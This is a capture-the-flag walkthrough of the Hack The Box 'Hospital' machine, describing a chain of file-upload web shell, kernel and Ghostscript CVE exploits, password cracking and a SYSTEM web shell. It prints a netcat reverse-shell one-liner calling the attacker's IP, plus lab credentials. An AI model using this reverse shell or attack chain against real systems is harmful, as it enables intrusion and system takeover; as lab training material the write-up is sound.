HTB Hospital: Walkthrough
Our attack on the target begins with a file upload vulnerability allowing us to upload a phar file gaining RCE on the target. This is followed with exploitation of CVE-2023-32629 due to a vulnerable kernel version, giving us SSH access to the target. Then, we utilize our access on the machine to extract and crack a user’s password from /etc/shadow. We use that check for any password reuse on an additional webserver thats vulnerable to CVE-2023-36664, giving us access to the host machine. Finally, we can utilize the running webserver running as SYSTEM to host our own .php web shell file, rooting the machine.
0) Machine Overview
1) Scans
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1801/tcp open msmq
2103/tcp open zephyr-clt
2105/tcp open eklogin
2107/tcp open msmq-mgmt
2179/tcp open vmrdp
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
6404/tcp open boe-filesvr
6406/tcp open boe-processsvr
6407/tcp open boe-resssvr1
6409/tcp open boe-resssvr3
6617/tcp open unknown
6640/tcp open ovsdb
8080/tcp open http
9389/tcp open adws
Seems like there quite a few junk ports. But there is a webserver running on 8080.
Enum4Linux:
Looks like we’re dealing with an AD machine.
2) Web Enumeration
443 HTTPS:
8080 HTTP:
Lets first mess with the 8080 webserver, as the one on 443 doesn’t look too promising at the moment. I’ll be running a gobuster scan on both webservers in the background.
We’ll first create a user and see what kind of things we have access to.
In this case, we have a file upload form. We can try uploading a random image and see if we can find out where it gets stored.
If we run a gobuster, we notice a /uploads directory:
If we access /uploads directly, we get a 403 forbidden. However, if we try to access the full path assuming our file got stored here, we can access it:
In this case, lets try uploading various kinds of file extensions using intruder and see what’s accepted and what isn’t:
As we can see, most our options for executing any kind of code seems low. However, if we research what file extensions can potentially execute PHP code, .phar is a possibility. And if we take a look at our Intruder output, .phar is actually accepted.
Lets try uploading a simple web-shell first to see if this’ll actually work.
So the file actually uploaded, but when I try to run any commands, the page just returns a blank white page to me. Lets try a full-fledged rev-shell, the one by PentestMonkey.
Doesn’t work either, but at least we know our file is being executed.
I eventually came across p0wny-shell which gives an extremely interesting web-shell, and works perfectly.
3) Privilege Escalation
Now if we recall earlier, our port scans gave us that this was a Windows machine. However in our current situation, we’re on:
Time to look around and see what we can find and do.
First off, I was able to find some MySQL DB creds in config.php
root:my$qls3rv1c3!
To be able to actually access the DB, we’ll need to get a proper shell. Lets upgrade our shell.
1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.14 5555 >/tmp/f
Once shell is caught, I like to run export TERM=xterm and python3 -c 'import pty;pty.spawn("/bin/bash")' to make sure my shell is all nice and cozy, and makes sure that there’s proper I/O handling.
So we have 2 hashes now, obviously the 3rd belonging to our user. Lets try cracking, all though these are bcrypt hashes.
Admin’s Hash:
Patient’s Hash:
Quite useless they seem.
After a while, I decided to check if the kernel version was vulnerable, as I had originally discarded it at first. And it seems it actually is to CVE-2023-32629:
With a very easy to use PoC, we can quickly run this exploit.sh script and escalate:
Lets get a stable SSH connection now.
4) Web Enumeration 2
First, I decided to start enumerating a bit of drwilliams home directory, and also took their hash and cracked it offline, with the hopes that I could potentially use the plain-text on SMB or LDAP.
Yessir.
Could only connect to SYSVOL, didn’t find much in there.
Lets go try those credentials on the other web application:
If we read the email, he mentions something about .eps file extensions, and “GhostScript”.
I didn’t know what either of those were, so I made a quick google search, and to my surprise:
From the description of the PoC, we can see this exploit happens upon GhostScript opening a .eps file and then mishandling permission validation, giving us RCE.
Lets give it a try:
Reply back to drbrown with the file attached, and voila:
Now to execute it:
5) Privilege Escalation 2
At first, I tried uploading SharpHound.exe and uploading its data into BloodHound to see if there was a path from drbrown to Domain Admin. Unfortunately there wasn’t. So I had to resort to some manual enumeration:
I checked out the ghostscript.bat file that was located in our user’s documents directory, and found his password.
chr!$br0wn
Why don’t we try RDP’ing into the machine now?
Now that we’re connected, lets check Task Manager. If we notice, we’ll see the web server that’s running.
We can check the Properties of the executable that’s running the service. We can see that its httpd.exe
Well… What if that web server is running in the context of Administrator or System. We could try uploading our own file and then access it and get a shell in that context. And that is exactly the case in this scenario, if we run tasklist /V:
(Note: Now typically, we could have just ran tasklist /V within our shell without having to RDP. However, I was unable to run it for some reason due.)
We can do a quick ChatGPT and see that: In XAMPP, the web server files are typically stored in the "htdocs" directory.
So now we’ll upload a file into the C:/xampp/htdocs, and then access it via the URL.
Pwned.